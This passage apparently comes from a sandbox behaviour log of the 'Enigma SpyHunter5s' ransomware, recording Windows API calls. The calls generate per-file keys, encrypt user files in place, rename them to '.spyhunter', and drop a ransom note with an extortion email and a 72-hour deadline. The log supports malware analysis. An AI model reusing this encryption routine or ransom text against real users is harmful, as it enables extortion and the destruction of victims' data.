out: hHeap=0x2c0000) returned 1 [0156.428] GetProcessHeap () returned 0x2c0000 [0156.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d0a8 | out: hHeap=0x2c0000) returned 1 [0156.428] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecb8 | out: pbBuffer=0x25cecb8) returned 1 [0156.428] GetProcessHeap () returned 0x2c0000 [0156.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.428] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cecb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cecb0*=0x30) returned 1 [0156.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.428] GetProcessHeap () returned 0x2c0000 [0156.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.428] GetProcessHeap () returned 0x2c0000 [0156.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4778 | out: hHeap=0x2c0000) returned 1 [0156.428] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cecb0 | out: pbBuffer=0x25cecb0) returned 1 [0156.428] GetProcessHeap () returned 0x2c0000 [0156.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.429] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceca8*=0x30) returned 1 [0156.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.429] GetProcessHeap () returned 0x2c0000 [0156.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.429] GetProcessHeap () returned 0x2c0000 [0156.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80898 | out: hHeap=0x2c0000) returned 1 [0156.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.430] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.430] WriteFile (in: hFile=0x9c, lpBuffer=0x25cebe3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced0c, lpOverlapped=0x0 | out: lpBuffer=0x25cebe3*, lpNumberOfBytesWritten=0x25ced0c*=0x127, lpOverlapped=0x0) returned 1 [0156.430] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.430] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced0c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced0c*=0x2ac, lpOverlapped=0x0) returned 1 [0156.431] CloseHandle (hObject=0x9c) returned 1 [0156.431] GetProcessHeap () returned 0x2c0000 [0156.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d198 | out: hHeap=0x2c0000) returned 1 [0156.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.431] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.431] WriteFile (in: hFile=0x9c, lpBuffer=0x25cebdf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced08, lpOverlapped=0x0 | out: lpBuffer=0x25cebdf*, lpNumberOfBytesWritten=0x25ced08*=0x127, lpOverlapped=0x0) returned 1 [0156.432] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.432] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced08, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced08*=0x2ac, lpOverlapped=0x0) returned 1 [0156.435] CloseHandle (hObject=0x9c) returned 1 [0156.435] GetProcessHeap () returned 0x2c0000 [0156.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbdbb0 | out: hHeap=0x2c0000) returned 1 [0156.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.437] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.437] WriteFile (in: hFile=0x9c, lpBuffer=0x25cebdb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced04, lpOverlapped=0x0 | out: lpBuffer=0x25cebdb*, lpNumberOfBytesWritten=0x25ced04*=0x127, lpOverlapped=0x0) returned 1 [0156.438] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.438] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced04, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced04*=0x2ac, lpOverlapped=0x0) returned 1 [0156.438] CloseHandle (hObject=0x9c) returned 1 [0156.438] GetProcessHeap () returned 0x2c0000 [0156.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc3d30 | out: hHeap=0x2c0000) returned 1 [0156.439] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceca0 | out: pbBuffer=0x25ceca0) returned 1 [0156.439] GetProcessHeap () returned 0x2c0000 [0156.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.439] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec98*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec98*=0x30) returned 1 [0156.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 141 [0156.439] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".txt") returned 0x0 [0156.440] GetProcessHeap () returned 0x2c0000 [0156.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.440] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec5c*=0x2800, lpOverlapped=0x0) returned 1 [0156.483] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.483] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cec5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec5c*=0x2800, lpOverlapped=0x0) returned 1 [0156.483] GetProcessHeap () returned 0x2c0000 [0156.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.483] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.483] WriteFile (in: hFile=0x9c, lpBuffer=0x25cec9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec5c, lpOverlapped=0x0 | out: lpBuffer=0x25cec9c*, lpNumberOfBytesWritten=0x25cec5c*=0x4, lpOverlapped=0x0) returned 1 [0156.483] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec5c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec5c*=0x30, lpOverlapped=0x0) returned 1 [0156.484] CloseHandle (hObject=0x9c) returned 1 [0156.484] GetProcessHeap () returned 0x2c0000 [0156.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.484] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.spyhunter") returned 151 [0156.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.spyhunter")) returned 1 [0156.486] GetProcessHeap () returned 0x2c0000 [0156.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.486] GetProcessHeap () returned 0x2c0000 [0156.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.486] GetProcessHeap () returned 0x2c0000 [0156.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff45b0 | out: hHeap=0x2c0000) returned 1 [0156.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.487] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.487] WriteFile (in: hFile=0x9c, lpBuffer=0x25cebd3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cecfc, lpOverlapped=0x0 | out: lpBuffer=0x25cebd3*, lpNumberOfBytesWritten=0x25cecfc*=0x127, lpOverlapped=0x0) returned 1 [0156.488] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.488] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cecfc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cecfc*=0x2ac, lpOverlapped=0x0) returned 1 [0156.488] CloseHandle (hObject=0x9c) returned 1 [0156.488] GetProcessHeap () returned 0x2c0000 [0156.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3c630 | out: hHeap=0x2c0000) returned 1 [0156.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.490] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.490] WriteFile (in: hFile=0x9c, lpBuffer=0x25cebcf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cecf8, lpOverlapped=0x0 | out: lpBuffer=0x25cebcf*, lpNumberOfBytesWritten=0x25cecf8*=0x127, lpOverlapped=0x0) returned 1 [0156.491] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.491] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cecf8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cecf8*=0x2ac, lpOverlapped=0x0) returned 1 [0156.491] CloseHandle (hObject=0x9c) returned 1 [0156.491] GetProcessHeap () returned 0x2c0000 [0156.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f22908 | out: hHeap=0x2c0000) returned 1 [0156.491] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec98 | out: pbBuffer=0x25cec98) returned 1 [0156.491] GetProcessHeap () returned 0x2c0000 [0156.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.491] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec90*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec90*=0x30) returned 1 [0156.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.492] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001") returned 152 [0156.492] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0156.492] GetProcessHeap () returned 0x2c0000 [0156.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.492] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cec54*=0x29, lpOverlapped=0x0) returned 1 [0156.493] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.493] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x25cec54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cec54*=0x29, lpOverlapped=0x0) returned 1 [0156.493] GetProcessHeap () returned 0x2c0000 [0156.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.493] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.493] WriteFile (in: hFile=0x9c, lpBuffer=0x25cec94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec54, lpOverlapped=0x0 | out: lpBuffer=0x25cec94*, lpNumberOfBytesWritten=0x25cec54*=0x4, lpOverlapped=0x0) returned 1 [0156.493] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec54, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec54*=0x30, lpOverlapped=0x0) returned 1 [0156.494] CloseHandle (hObject=0x9c) returned 1 [0156.494] GetProcessHeap () returned 0x2c0000 [0156.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.494] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001.spyhunter") returned 162 [0156.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\MANIFEST-000001.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\manifest-000001.spyhunter")) returned 1 [0156.495] GetProcessHeap () returned 0x2c0000 [0156.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.495] GetProcessHeap () returned 0x2c0000 [0156.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.495] GetProcessHeap () returned 0x2c0000 [0156.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f22780 | out: hHeap=0x2c0000) returned 1 [0156.495] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, 